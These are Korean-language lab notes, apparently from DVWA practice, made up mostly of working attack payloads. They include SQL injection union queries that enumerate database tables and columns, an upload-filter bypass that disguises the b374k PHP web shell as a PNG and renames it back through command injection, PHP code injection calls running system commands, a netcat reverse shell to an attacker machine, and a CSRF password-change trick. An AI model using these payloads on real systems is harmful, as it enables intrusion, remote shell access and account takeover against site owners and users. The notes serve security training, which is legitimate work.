

' union select 1,2 #
' union select database(),version() #

' union select table_name,null from information_schema.tables where table_schema='dvwa' #

' union select column_name,null from information_schema.columns where table_schema='dvwa' and table_name='users' #


업로드 파일 : b374k-2.8.php
조건 : 서버 측의 jpg, jpge, png 확장자 검증
방법
b374k-2.8.php > b374k-2.8.png 확장자 변경
파일 시그니처 변경
HEX 에디션으로 헤더 추가

; mv ../../hackable/uploads/b374k-2.8.png ../../hackable/uploads/b374k-2.8.php

주소 창 : /././phpi.php?message=test
PHP에 리눅스 명령어를 사용 가능하게하는 명령어
변형
/././phpi.php??message=exec('pwd')

/././phpi.php??message=system('pwd')

/././phpi.php??message=shell_exec('whoami')

/././phpi.php??message=passthru('ps -ef')

/././phpi.php??message=passthru('cat /var/log/wtmp') // 로그 일부 확인 가능

/././phpi.php??message=passthru('cat /var/log/dmesg')

응용
칼리에서 포트를 연다

/././phpi.php??message=passthru('; nc 192.168.5.129 8000 -e /bin/sh)
열어둔 kali에 연결

연결 확인

스크립트를 활용하는 공격으로 클라이언트에게 주어진 권한으로 웹서버에게 어떤 요청을 보내는 공격

자동 댓글달기 : 사용자가 게시판 글을 읽기만 했는데 스크립트가 실행되면서 자동으로 댓글이 달리거나 좋아요가 눌러지는 것, 패스워드 변경 : 사용자의 패스워드를 변경하는 시도, 자동으로 탈퇴요청을 보내기 등
방법
개발자 노트를 이용하여 비밀번호 넣는 부분의 코드를 복사하여 html파일을 생성한다.

해당 부분을 변경

클릭을 하게 되면 값을 지정하였던 123123으로 비밀번호가 변경되게 된다.
